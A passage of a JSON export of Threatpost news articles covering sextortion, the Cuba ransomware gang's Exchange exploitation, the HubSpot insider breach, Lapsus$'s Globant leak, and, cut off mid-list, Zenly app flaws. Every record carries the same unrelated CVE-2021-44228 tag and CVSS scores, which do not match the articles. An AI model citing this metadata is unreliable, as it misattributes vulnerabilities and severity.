Sextortion is on the Rise Again\n\n\u201cScams seem to run in cycles,\u201d notes Parkin. \u201cWhether it\u2019s a Prince from Nigeria, uncollected assets, scam victim compensation, extortion over adult websites you didn\u2019t visit, or whatever. Scammers will use one for a while, then shift to something else when they stop getting responses. Eventually, they\u2019ll circle back to an old scam that may have been updated with new text or a new graphic.\u201d\n\nLionel Sigal, CTI at CYE, told Threatpost via email that sextortion has recently been skyrocketing; \u201cSextortion attempts (real and fake) targeting executives of organizations have increased by 800% in the last 4 months,\u201d he said.\n\nCampaigns targeting ordinary individuals are also spiking: The FBI\u2019s Internet Crime Complaint Center received more than [16,000 sextortion complaints](<https://www.ic3.gov/Media/Y2021/PSA210902>) in only the first seven months of 2021.\n\nWill this old-hat method of cyber attack prove effective? \u201cIt\u2019s too early to tell what the hit rate is on this technique,\u201d Casey Ellis, Founder and CTO of Bugcrowd, told Threatpost via email, \u201cbut it feels to me like a pivot that people would fall for. If a scam has a take of $500 and it costs 1 cent to send an email, you only have to connect 1 in 50,000 times for the scam to break even.\u201d\n\nTo Parkin, \u201cthe best defense is solid user education. No matter how successful an attacker is at getting past the filters, their attack can only succeed if the target falls for it and takes the bait.\u201d\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-23T17:20:41", "type": "threatpost", "title": "Sextortion Rears Its Ugly Head Again", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-23T17:20:41", "id": "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "href": "https://threatpost.com/sextortion-rears-its-ugly-head-again/178595/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T20:31:43", "description": "The ransomware gang known as \u201cCuba\u201d is increasingly shifting to exploiting Microsoft Exchange vulnerabilities \u2013 including [ProxyShell](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) and [ProxyLogon](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) \u2013 as initial infection vectors, researchers have found.\n\nThe group has likely been prying open these chinks in victims\u2019 armor as early as last August, Mandiant [reported](<https://www.mandiant.com/resources/unc2596-cuba-ransomware>) on Wednesday.\n\nMandiant, which tracks the threat actor as UNC2596, noted that the group deploys the COLDDRAW ransomware. In fact, Cuba may be the only group that uses COLDDRAW: At least, it\u2019s the only threat actor using it among those tracked by Mandiant, \u201cwhich may suggest it\u2019s exclusively used by the group,\u201d researchers said.\n\n## Cuba Has Rated an FBI Warning\n\nIn a December [flash alert](<https://www.ic3.gov/Media/News/2021/211203-2.pdf>), the FBI [attributed](<https://threatpost.com/cuba-ransomware-gang-44m-payouts/176790/>) a spate of attacks \u2013 on at least 49 U.S. entities in the financial, government, healthcare, manufacturing and information-technology sectors \u2013 to the group. For what it\u2019s worth, Mandiant hasn\u2019t seen Cuba attacking hospitals or other entities that provide urgent care.\n\nAt the time, the FBI noted that the Cuba ransomware is distributed using a first-stage implant that acts as a loader for follow-on payloads: the Hancitor malware, which has been around for [at least five years](<https://threatpost.com/hancitor-downloader-shifts-attack-strategy/120040/>).\n\nThis isn\u2019t the first time that Cuba has shown a taste for [Exchange vulnerabilities](<https://threatpost.com/tortilla-exchange-servers-proxyshell/175967/>), either. They\u2019re just one way that Hancitor operators gain initial access to target machines: Other avenues include phishing emails, and the exploitation of compromised credentials or legitimate Remote Desktop Protocol (RDP) tools, according to the FBI\u2019s December alert.\n\n## Microsoft Exchange Action\n\nTrue to form, Mandiant observed the group \u201cfrequently\u201d picking apart vulnerabilities on public-facing Microsoft Exchange infrastructure as an initial compromise vector. \u201cThe threat actors likely perform initial reconnaissance activities to identify internet-facing systems that may be vulnerable to exploitation,\u201d researchers said.\n\nNext, Cuba deployed webshells to establish a foothold in the compromised network. Then, the actors planted backdoors to establish a foothold, including the publicly available NetSupport RAT, as well as BEACON and BUGHATCH, which have been deployed using the TERMITE in-memory dropper.\n\nThe operators have mainly used credentials from valid accounts to escalate privileges, researchers noted. It\u2019s not always clear where they got the credentials from, but at least in some cases, they were stolen with credential-stealing tools such as Mimikatz and WICKER.\n\n\u201cWe have also observed these threat actors manipulating or creating Windows accounts and modifying file access permissions,\u201d researchers added. In one intrusion, the threat actor created a user account and added it to the admin and RDP groups, they said.\n\n## Infection Chain\n\nIn order to identify active network hosts to potentially encrypt and files to exfiltrate, Cuba has used WEDGECUT, a reconnaissance tool, which sends PING requests to a list of hosts generated by a PowerShell script that enumerates the Active Directory.\n\nThen, the crooks peek around to see what files might be of interest. They also routinely use a script to map all drives to network shares, \u201cwhich may assist in user file discovery,\u201d researchers noted.\n\nCuba threat actors have used several methods for lateral movement, including RDP, SMB, and PsExec, \u201cfrequently using BEACON to facilitate this movement,\u201d Mandiant said. Then they deploy various backdoors, including NetSupport, as well as BEACON and BUGHATCH, which are often deployed using the TERMITE in-memory dropper.\n\nTo finish up their extortion work, the gang tries to steal files and encrypt networked machines, threatening to publish to the shaming site exfiltrated data belonging to organizations that balk at paying ransom.\n\n## More Tools, More Malware\n\nAccording to Mandiant\u2019s report, Cuba is using webshells to load the TERMITE dropper: a password-protected, memory-only dropper with an encrypted shellcode payload. The payloads have included BEACON malware, the Metasploit stager or the group\u2019s custom BUGHATCH downloader.\n\nCuba isn\u2019t the only threat actor using the TERMITE dropper: Mandiant said that it\u2019s apparently used by \u201ca limited number\u201d of threat actors.\n\nOver the course of six months, collected TERMITE payloads show that its keepers have been grooming TERMITE, tweaking it so as to better burrow in and evade detections, researchers said.\n\n## Custom-Rolled Malware & Tools\n\nBeyond common, mainstay malware tools such as Cobalt Strike and [NetSupport](<https://malwiki.org/index.php?title=NetSupport_Manager>), Mandiant\u2019s analysis showed that Cuba has some novel malware up its sleeve, including:\n\n**BURNTCIGAR**: a utility that terminates endpoint security software.\n\n**WEDGECUT**: a reconnaissance tool that checks to see whether a list of hosts or IP addresses are online.\n\n**BUGHATCH**: a custom downloader that receives commands and code from a command-and-control (C2) server to execute on a compromised system.\n\nThe researchers noted that when COLDDRAW was deployed, Cuba used what they called \u201ca multi-faceted extortion model\u201d \u2013 i.e., besides encrypting data, the gang leaked it on the group\u2019s shaming site, which is depicted below in all its cigar-chomping glory.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/25121905/Cuba-ransomware-shaming-site-e1645809565513.png>)\n\nCuba ransomware\u2019s shaming site. Source: Mandiant.\n\n## Who Does Cuba Love the Best?\n\nThe majority \u2013 80 percent \u2013 of organizations victimized by Cuba are based in North America, but Cuba loves the United States more than anywhere. As shown by the victim map below, the United States is Cuba\u2019s favorite target, followed by Canada, though the group does go after European countries and other regions.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/25122040/cuba-ransomware-victims-per-country-e1645809655324.png>)\n\nCuba ransomware victims by country. Source: Mandiant.\n\nIts favorite industry sector to pick on is manufacturing, followed by financial services.\n\nWith regards to the victims listed on its shaming site \u2013 which the gang has had up since only early 2021 \u2013 Cuba provides a victim list for free, but it also keeps a separate list that you have to pay to see. Mandiant bit the bullet and sprang for that paid section.\n\nIt was sparse, to say the least: \u201c[The] paid section \u2026 listed only a single victim at the time of publication,\u201d its report said.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-25T19:46:57", "type": "threatpost", "title": "Microsoft Exchange Server Bugs Exploited by 'Cuba' Ransomware Gang", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-25T19:46:57", "id": "THREATPOST:09118C676E28AC5D7BB791E76F75453C", "href": "https://threatpost.com/microsoft-exchange-exploited-cuba-ransomware/178665/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T17:16:18", "description": "A rogue employee working at HubSpot \u2013 used by more than 135,000 ([and growing](<https://www.hubspot.com/customer-spotlight>)) customers to manage marketing campaigns and on-board new users \u2013 has been fired over a breach that zeroed in on the company\u2019s cryptocurrency customers, the company [confirmed](<https://www.hubspot.com/en-us/march-2022-security-incident>) on Friday.\n\nThe breach has rippled through the crypto industry: As of Monday, crypto lending platform [BlockFi](<https://twitter.com/BlockFi/status/1504982848771608586>), bitcoin-purchasing automation platform [Swan Bitcoin](<https://twitter.com/SwanBitcoin/status/1505261139571191813>), bitcoin company [NYDIG](<https://nydig.com/>), peer-to-peer payments technology company Circle and cryptocurrency fund [Pantera Capital](<https://panteracapital.com/>) (which [was hit](<https://twitter.com/PanteraCapital/status/1362140521800622080?s=20&t=vQKoYhpK4bHoFjtc9V2KjQ>) a month prior) had been affected.\n\nThat list comes from the financial media outlet [Blockworks](<https://blockworks.co/nydig-blockfi-pantera-circle-all-targeted-in-hubspot-data-breach/>), which has reviewed emails the companies have sent to customers, along with public tweets, advising customers on how to stay safe.\n\nThe damage was minimal, HubSpot said in its March 18 notification: The thieves exported data from fewer than 30 customer portals. It\u2019s already notified the victimized companies, the company said.\n\nThreatpost asked HubSpot for a full list of affected HubSpot cryptocurrency customers, as well as confirmation of what superpowers its super admins have over customer data stored in the customer relationship management (CRM) platform. It responded by referring to one of those \u201cwe\u2019ve been breached\u201d canned [statements](<https://ir.hubspot.com/news/hubspots-statement-regarding-march-18-2022-security-incident>) that breached companies tend to put out: namely, \u201c\u200b\u200bWe take the privacy of our customers and their data incredibly seriously.\u201d\n\n## \u2018Bad Actor\u2019 Has Been Canned\n\nHubSpot said that it learned on Friday that a \u201cbad actor\u201d had compromised a HubSpot employee account \u2013 namely, what sounds like one of the \u2018super admin\u2019 accounts HubSpot has on both internal and external sides of its platform, [according to](<https://bitcoinmagazine.com/business/how-hubspot-data-breach-hits-bitcoiners>) another HubSpot super admin \u2013 and that the attack was focused on stealing data from its cryptocurrency industry customers.\n\n> \u201cWe have terminated access for the compromised HubSpot employee account and removed the ability for other employees to take certain actions in customer accounts.\u201d \u2014HubSpot\n\nThe rogue employee was attempting to access contact data, HubSpot [said](<https://www.cmswire.com/digital-marketing/hackers-target-cryptocurrency-companies-in-hubspot-data-breach/>). [CMS Wire](<https://www.cmswire.com/digital-marketing/hackers-target-cryptocurrency-companies-in-hubspot-data-breach/>) reported that HubSpot handed over details about the employee\u2019s actions to affected customers.\n\n## Data Stolen That Never Should Have Been There\n\nOn Saturday, the day after HubSpot reported the breach, Swan Bitcoin reassured customers that it uses HubSpot for \u201climited client communication and marketing data,\u201d not for financial information, transactions, or other sensitive personal or financial information.\n\n\u201cYou don\u2019t have to do anything,\u201d Swan reassured customers: \u201cYour funds are safe. Your Bitcoin is not at risk.\u201d\n\n> Yesterday, Hubspot, a third-party marketing vendor, confirmed a bad actor within their company gained access to Swan client marketing data.\n> \n> Read Cory\u2019s email to clients in the attached screenshots for details.\n> \n> We\u2019ll keep you updated. [pic.twitter.com/qtXVk5AOW8](<https://t.co/qtXVk5AOW8>)\n> \n> \u2014 Swan Bitcoin (@SwanBitcoin) [March 19, 2022](<https://twitter.com/SwanBitcoin/status/1505261139571191813?ref_src=twsrc%5Etfw>)\n\nAt least initially, it looked like data swept up in the breach was limited to names, emails, account types, phone numbers and, in some cases, company names, Swan said. The exfiltrated data didn\u2019t include Social Security numbers, tax IDs, birth dates, government IDs, bitcoin addresses or balances, according to Swan CEO Cory Klippstein.\n\nBut as of Tuesday, the situation looked a bit more grim, as Swan followed up with more details uncovered in its forensic investigation. It turns out that 0.2 percent of the dataset included \u201ca limited historical snapshot of USD deposits,\u201d the company said \u2013 an inclusion that\u2019s \u201cagainst company policy.\u201d The company said that it\u2019s conducted a post-mortem to ensure that the slippage won\u2019t happen again.\n\nAs well, about 1.2 percent of the dataset included clients\u2019 intended investment areas or the median net worth of their approximate geographic locales.\n\n\u201cAll of this sensitive data has been removed from client communications services, Klippstein [tweeted](<https://twitter.com/SwanBitcoin/status/1506355008127877123/>).\n\nhttps://twitter.com/SwanBitcoin/status/1506355008127877123/\n\nThe fact that sensitive financial or personal data weren\u2019t included in the dataset is a positive. But there\u2019s still plenty of damage that can be done with the details that were exfiltrated, security specialists \u2013 and that HubSpot Super Admin \u2013 hastened to point out, starting with [social](<https://threatpost.com/phony-instagram-support-staff-emails-hit-insurance-company/178929/>) [engineering](<https://threatpost.com/phishing-campaign-targeted-those-aiding-ukraine-refugees/178752/>) attacks.\n\n## Just What Data Do CRMs Handle?\n\nHubSpot officials told CMS Wire that \u201cSome employees have access to HubSpot accounts,\u201d which allows certain employees \u2013 such as account managers and support specialists \u2013 to help out customers. \u201cIn this case, a bad actor was able to compromise an employee account and make use of this access to export contact data from a small number of HubSpot accounts,\u201d HubSpot reportedly said.\n\nIn writing for [Bitcoin Magazine](<https://bitcoinmagazine.com/business/how-hubspot-data-breach-hits-bitcoiners>), HubSpot super admin Robert Warren described exactly what can be done with his level of access rights, which, internally, allows employees to \u201chop between company accounts and export contact lists (and potentially all associated CRM data).\u201d\n\n\u201cWhile it is true that financial data is not stored in the CRM, you should be aware that data associated with the users of these companies and their behaviors is logged in the CRM,\u201d Warren wrote. \u201cThis puts users in a unique position to be targeted in social engineering attacks.\u201d\n\nHe gave the following examples of the types of data that CRM systems can store and which may have been exported in the HubSpot breach:\n\n * IP addresses\n * Email histories with representatives at the associated companies and any messages or notes those representatives have on customers and their accounts\n * Customer browsing behavior on associated company websites\n * Mailing and/or shipping addresses\n * How customers are characterized internally by companies (\u201cbig buyer,\u201d \u201cwhale,\u201d \u201cmid-sized contact,\u201d \u201csmall user,\u201d etc.)\n * Individual customers\u2019 financial value to companies\n * Any and all deals customers have done with compromised companies and any associated values, email negotiations or contacts\n * Help tickets or requests customers have logged with compromised companies\n\n## Breach Is \u2018Not Surprising\u2019\n\nCamellia Chan, CEO and founder of embedded artificial intelligence (AI) company X-PHY (a [Flexxon](<https://www.flexxon.com/>) brand), told Threstpost that given the surge in digital currency development, the breach \u201cisn\u2019t terribly surprising_._\u201d\n\n\u201cSurges in technological advancement create the perfect environment for cybercrime to flourish,\u201d Chan said. \u201cSo, with the rapid development of digital currencies was sure to come a rise in the cybersecurity risks associated with it.\u201d\n\nThe incident spotlights a much wider issue, Chan said: namely, the quantity of sensitive data that these types of organizations store across the enterprise.\n\nIt \u201cputs not only a specific business at risk, but threatens the potential growth, development, and future success of the entire digital currency industry,\u201d the CEO said.\n\n## Data Shared with Third-Parties Slips Out of Your Hands\n\nChris Clements, vice president of solutions architecture at cybersecurity company Cerberus Sentinel, told Threatpost that software-as-a-service (SaaS) and managed service providers are tempting targets, given that cybercriminals know that if they successfully compromise the provider, \u201cthey will likely gain access to the data or networks of hundreds or thousands of the providers\u2019 downstream customers.\n\n\u201cIt\u2019s a shortcut to mass exploitation that could otherwise take the attacker months or even years to achieve independently,\u201d Clements said via email.\n\nWord to the wise, HubSpot customers. Clements said that it\u2019s \u201cimperative\u201d for organizations to understand that whatever data they share with third-party partners or vendors \u201clargely becomes out of their control and with little recourse should it be stolen if the 3rd party is compromised.\u201d\n\nClements advised that all third parties be part of a regularly updated risk analysis based on the level of access or sensitivity of data shared with them.\n\n\u201cThe results of the risk analysis should inform a cybersecurity strategy for partner or vendor controls and mitigations to provide higher level of security assurance as is deemed necessary,\u201d he continued.\n\nSuch assessments should be backed up by mechanisms that verify that third parties are \u201ctaking appropriate steps to provide the needed security assurances and that they can prove it by sharing details about their controls or results of independent validation like a penetration test,\u201d Clements said.\n\n\u201d Not all vendors or partners can or will share this with their customers, but it\u2019s critical that in absence of that an organization throw up their hands as if nothing further can be done,\u201d he emphasized.\n\nHe gave these example of what questions should be covered:\n\n * Are there controls or safeguards built into the service platform that offer tighter controls or enhanced monitoring capabilities?\n * Are there operational processes that can limit potential data exposure from a breach of a partner like maximum data retention lifetimes?\n * At worst, is it no longer an acceptable risk to continue to do business with the company and to seek out alternatives?\n\n\u201cThese are all best practices for cybersecurity 3rd party management, but in order for them to be comprehensively applied, your organization requires a true culture of security that ensures that all external data sharing is evaluated for compliance with its own cybersecurity goals,\u201d he suggested.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T17:11:40", "type": "threatpost", "title": "HubSpot Data Breach Ripples Through Crytocurrency Industry", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T17:11:40", "id": "THREATPOST:48FD4B4BFA020778797D684672C283B0", "href": "https://threatpost.com/hubspot-data-breach-crytocurrency-industry/179086/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:35:11", "description": "The Lapsus$ data extortionists are back from a week-long \u201cvacation,\u201d they announced on Telegram, posting ~70GB worth of data purportedly stolen from software development giant Globant.\n\n\u201cWe are officially back from a vacation,\u201d the gang wrote on their Telegram channel, posting images of exfiltrated data and admin credentials. The credentials, purportedly belonging to Globant\u2019s customers, unlock several of the company\u2019s Atlassian suite DevOps platforms, including GitHub, Jira, Confluence and the Crucible code-review tool.\n\nThe shared, 70GB torrent file purportedly also contains Globant\u2019s source code, as well as the Atlassian admin passwords. Security researchers shared the images today, on Wednesday.\n\nScreenshots show a folder directory of what looks like scads of companies from across the world, including tech bigwigs Arcserve, Facebook, the Apple Health app, DHL, Citibank, BNP Paribas Cardiff and Citibanamex, among others: just a teaser of the Globant data Lapsus$ has promised to leak.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/30111855/Lapsus_Globant_leak-e1648653558836.jpg>)\n\nA teaser of the Globant data Lapsus$ said it was about to leak. Source: Telegram.\n\n> This is bad with all the keys, codes and damaging databases to go through to find corporate exposure and liability and to secure digital assets. <https://t.co/FHcs88V3nM>\n> \n> \u2014 Dominic Alvieri (@AlvieriD) [March 30, 2022](<https://twitter.com/AlvieriD/status/1509174961822486538?ref_src=twsrc%5Etfw>)\n\nThe folders could be evidence of client data having been exposed, or they might just refer to Globant backups. But Lapsus$ followed up by posting a 718.8KB torrent file to Telegram \u2013 a file that allegedly contains the leaked data. The post says: \u201cLeak of some customers source code from Globant[.]com corp GHE and GHE.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/30113855/Lapsus-followup-torrent-file-e1648654747345.jpg>)\n\nFollowup torrent file posted to Lapsus$\u2019s Telegram channel. Source: Telegram.\n\nBut as GovInfoSecurity [pointed out](<https://www.govinfosecurity.com/despite-arrests-lapsus-adds-globant-to-victim-list-a-18813>), even if Globant\u2019s source code wasn\u2019t directly affected, the source code of the software it provides to its customers may be.\n\n## About Those Admin Credentials\n\nVx-underground \u2013 an internet collection of malware source code, samples and papers \u2013 cited security researcher Dominic Alvieri in tweeting that Lapsus$ threw Globant\u2019s sysadmins \u201cunder the bus\u201d by exposing their passwords to Confluence and other DevOps platforms.\n\nThat shouldn\u2019t come as a surprise: It\u2019s not like the data extortion group has a collection of kid gloves. It has, rather, slapped around the likes of [Brazil\u2019s Ministry of Health](<https://www.zdnet.com/article/brazilian-ministry-of-health-suffers-cyberattack-and-covid-19-vaccination-data-vanishes/>), the gaming giant [Ubisoft](<https://www.toolbox.com/it-security/security-general/news/lapsus-ubisoft-security-incident/>), [Portuguese media kingpin](<https://threatpost.com/portuguese-media-giant-impresa-ransomware/177323/>) Impresa, and, in recent weeks, eviscerated tech giants including [Samsung](<https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/>), [Nvidia](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>), [Microsoft](<https://threatpost.com/microsoft-lapsus-compromised-one-employees-account/179048/>) and [Okta](<https://threatpost.com/lapsus-data-kidnappers-claim-snatches-from-microsoft-okta/179041/>).\n\nVx-underground censored those admin passwords, but its whiteout treatment can\u2019t hide the fact that the passwords were pretty stubby and, hence, [pretty guessable](<https://threatpost.com/euros-football-fever-dumb-passwords/166974/>), as well as being [reused](<https://threatpost.com/threatlist-people-know-reusing-passwords-is-dumb-but-still-do-it/155996/>). \u201cWe have censored the passwords they displayed. However, it should be noted these passwords are very easily guessable and used multiple times,\u201d the collection noted.\n\n> LAPSUS$ also threw their System Admins under the bus exposing their passwords to confluence (among other things). We have censored the passwords they displayed. However, it should be noted these passwords are very easily guessable and used multiple times\u2026 [pic.twitter.com/gT7skg9mDw](<https://t.co/gT7skg9mDw>)\n> \n> \u2014 vx-underground (@vxunderground) [March 30, 2022](<https://twitter.com/vxunderground/status/1509015154930896899?ref_src=twsrc%5Etfw>)\n\nIn fact, after reviewing the admin passwords, GovInfoSecurity found that a similar-looking password was reused for the Confluence and Jira platforms, while the one used for GitHub \u201cappears similar to ones on the list of[ 200 most commonly used passwords](<https://nordpass.com/most-common-passwords-list/>).\u201d\n\n## So Much for the Arrests\n\nLapsus$\u2019s \u201cvacation\u201d may have been in Tahiti, for all we know, or it may have been time spent reshuffling. At any rate, last week, the City of London Police [arrested](<https://threatpost.com/uk-cops-collar-7-suspected-lapsus-gang-members/179098/>) seven people suspected of being connected to the gang.\n\nThe bust came within hours of Bloomberg having published a [report](<https://www.bloomberg.com/news/articles/2022-03-23/teen-suspected-by-cyber-researchers-of-being-lapsus-mastermind?sref=ylv224K8>) about a teenage boy living at his mother\u2019s house near Oxford, England who\u2019s suspected of being the Lapsus$ mastermind. The police didn\u2019t verify whether or not they nabbed the Oxford teen, per se, but given that he\u2019s a minor, they legally couldn\u2019t divulge that detail anyway.\n\nAll of the suspects arrested by London police were released, but the law isn\u2019t going to let up.\n\nAs of a week ago, March 21, the FBI had slapped Lapsus$ onto its [Most Wanted](<https://www.fbi.gov/wanted/seeking-info/lapsus>) list.\n\n\u201cOn March 21, 2022, individuals from a group identifying themselves as Lapsus$ posted on a social media platform and alleged to have stolen source code from a number of United States-based technology companies,\u201d the FBI said. \u201cThese unidentified individuals took credit for both the theft and dissemination of proprietary data that they claim to have illegally obtained. The FBI is seeking information regarding the identities of the individuals responsible for these cyber intrusions.\u201d\n\nKen Westin, director, security strategy at Cybereason, told Threatpost on Wednesday that Lapsus$\u2019s quick resurface after its short hiatus isn\u2019t surprising, given the fact that cybercriminal networks are often spread around the world.\n\n\u201cCybercrime groups, like hacktivist groups, often work in a decentralized fashion, with many members not even knowing each other\u2019s true identities,\u201d he said via email. \u201cThe fact this group is made up of members in many different countries presents challenges for law enforcement as they will need to collaborate with different countries with varying levels of capabilities to go after the perpetrators.\u201d\n\nWestin noted that the Globant breach \u201cseems a bit different on the surface,\u201d given that the resources that were allegedly compromised were around Globant\u2019s DevOps processes. It raises the question of where the initial compromise was and what Lapsus$ did with the access. Wha\u201dt is also concerning regarding this compromise is that potential source code for some of their customers appears to have been exposed and Lapsus$ is going after organizations via Globant\u2019s technology and now services partners,\u201d he added.\n\n033022 12:40 UPDATE: Added input from Ken Westin.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T16:29:10", "type": "threatpost", "title": "Lapsus$ \u2018Back from Vacation\u2019", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-30T16:29:10", "id": "THREATPOST:38E044431D55F0A4BC458FF92EB025BF", "href": "https://threatpost.com/lapsus-back-from-vacation/179156/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-24T20:38:32", "description": "Zenly, a social app from Snap that allows users to see the locations of friends and family on a live map, contains a pair of vulnerabilities that could endanger those being tracked.\n\nAccording to the Checkmarx Security Research Team, the bugs are a user-data exposure vulnerability and an account-takeover vulnerability. Both have been patched, and users should upgrade their apps to the latest version to avoid compromise.\n\n## **Phone-Number Reveal**\n\nThe first bug is a medium-severity problem that reveals the phone numbers of users.\n\n\u201cWhen submitting a friend request to a user, Zenly will allow access to their phone number regardless of whether the friend request is accepted or not,\u201d explained the researchers, in a [Thursday posting](<https://checkmarx.com/blog/zenly-fixes-user-data-exposure-and-account-takeover-risks/>). \u201cTo obtain this information, a malicious actor only needs to know their username.\u201d\n\nObtaining usernames is easier than it might be, they added, since Zenly exposes an \u201cexhaustive list of friends of a user.\u201d\n\nAs for how an attack might play out in practice, Checkmarx offered a hypothetical of a cyberattacker targeting a CEO.\n\nSteps in the kill chain would include the following, researchers said:\n\n * Search the web for an employee of the company and try to obtain their social-media handle (for example, on Twitter);\n * Employees who work on communications or marketing fields are typically more exposed and represent easier targets;\n * Check if their handle is valid on Zenly;\n * Access their list of friends through Zenly, obtain the handle of the 